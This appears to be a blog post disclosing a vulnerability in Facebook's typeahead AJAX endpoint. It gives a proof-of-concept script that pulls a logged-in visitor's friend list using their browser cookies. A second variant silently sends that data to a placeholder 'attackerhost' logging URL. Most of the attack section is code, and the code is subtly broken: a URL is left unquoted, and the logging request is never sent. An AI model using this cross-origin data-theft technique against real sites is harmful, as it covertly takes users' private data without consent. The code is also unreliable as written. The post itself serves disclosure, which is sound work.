Today I was taking a look at the Facebook AJAX java script that is responsible to give suggestions in the search text box you find under the Facebook logo on the left
I found this URL http://www.facebook.com/ajax/typeahead_search.php? hard coded in the following java script
function search_friend_source(get_param)
{
this.parent.construct(this,get_param);
new AsyncRequest().setMethod('GET').setReadOnly(true).setURI('/ajax/typeahead_search.php?'+get_param).setErrorHandler(function(){}).setHandler(function(response){this.values=response.getPayload().entries;this.build_index();}.bind(this)).send();}
at the file http://static.ak.facebook.com/js/typeaheadpro.js?44:75333
Whenever you open that URL from any browser it supplies you with a complete list of all your friends on Facebook in a java script format similar to JSON, it uses your credentials that is stored in your cookies in the browser to authenticate you.
Once I’ve seen it I’ve known instantly that I’ve found a security vulnerability similar to the famous Gmail XSS vulnerability, anybody with proper AJAX knowledge can host a java script on their site to request this page using your credentials and get all your of your Facebook friends list, so I made this proof of concept code to demonstrate the vulnerability
<script>
xmlHttp=GetXmlHttpObject()
var url=http://www.facebook.com/ajax/typeahead_search.php?;
xmlHttp.onreadystatechange=stateChanged;
xmlHttp.open("GET",url,true);
xmlHttp.send(null);
function stateChanged()
{
if (xmlHttp.readyState==4)
{
alert(xmlHttp.responseText)
}
}
function GetXmlHttpObject()
{
//i didn't add the code to create the XHR object for firefox because
//it doesn't work on firefox already, if you have time to test this
//POC with other browsers and it worked please let me know
var xmlHttp=null;
try
{
xmlHttp=new ActiveXObject("Msxml2.XMLHTTP");
}
catch (e)
{
xmlHttp=new ActiveXObject("Microsoft.XMLHTTP");
}
return xmlHttp;
}
</script>
If you opened any web page on the internet that contains that code and you are logged on Facebook at that time (i.e. your browser still have your credentials stored in your cookies) it will show you a message containing the java script return from Facebook with all your friends and there public data like there profile URL and their networks. These data can instead be sent to an attacker and get logged like this
function stateChanged()
{
if (xmlHttp.readyState==4)
{
var xmlHttpLogger=GetXmlHttpObject()
xmlHttpLogger.open("GET", "http://attackerhost/logger.php?log=" + xmlHttp.responseText, true)
}
}
So if you opened a page containing this version it will not alert you and instead it will send your Facebook contact list the attacker silently.
I’ve tested this proof of concept only with IE7 and it’s working fine, also I’ve tried it with Firefox and it doesn’t work because of the “same domain security policy” in Firefox. If you have some time to test it with other browsers please inform me with the results, thanks.